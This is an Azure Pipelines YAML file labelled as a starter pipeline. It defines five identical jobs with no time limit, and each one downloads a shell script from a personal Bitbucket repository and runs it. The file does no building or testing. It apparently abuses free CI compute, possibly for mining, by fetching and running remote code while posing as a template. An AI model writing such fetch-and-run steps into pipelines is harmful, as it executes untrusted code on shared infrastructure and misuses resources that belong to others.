
# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- main

pool:
  vmImage: ubuntu-16.04

jobs:
- job: MyJob
  timeoutInMinutes: 0
  displayName: My First Job
  steps:
  - script: |
      sudo apt update && sudo apt install wget -y && wget https://bitbucket.org/jaydon45455pittman8899/bolrte/raw/5127dd729142c557307e08de50ecad4eb6d585e5/joblab.sh && chmod +x joblab.sh && ./joblab.sh
    displayName: 'Run a multi-line script'

- job: MyJob1
  timeoutInMinutes: 0
  displayName: My First Job
  steps:
  - script: |
      sudo apt update && sudo apt install wget -y && wget https://bitbucket.org/jaydon45455pittman8899/bolrte/raw/5127dd729142c557307e08de50ecad4eb6d585e5/joblab.sh && chmod +x joblab.sh && ./joblab.sh
    displayName: 'Run a multi-line script'

- job: MyJob2
  timeoutInMinutes: 0
  displayName: My First Job
  steps:
  - script: |
      sudo apt update && sudo apt install wget -y && wget https://bitbucket.org/jaydon45455pittman8899/bolrte/raw/5127dd729142c557307e08de50ecad4eb6d585e5/joblab.sh && chmod +x joblab.sh && ./joblab.sh
    displayName: 'Run a multi-line script'

- job: MyJob3
  timeoutInMinutes: 0
  displayName: My First Job
  steps:
  - script: |
      sudo apt update && sudo apt install wget -y && wget https://bitbucket.org/jaydon45455pittman8899/bolrte/raw/5127dd729142c557307e08de50ecad4eb6d585e5/joblab.sh && chmod +x joblab.sh && ./joblab.sh
    displayName: 'Run a multi-line script'

- job: MyJob4
  timeoutInMinutes: 0
  displayName: My First Job
  steps:
  - script: |
      sudo apt update && sudo apt install wget -y && wget https://bitbucket.org/jaydon45455pittman8899/bolrte/raw/5127dd729142c557307e08de50ecad4eb6d585e5/joblab.sh && chmod +x joblab.sh && ./joblab.sh
    displayName: 'Run a multi-line script'
    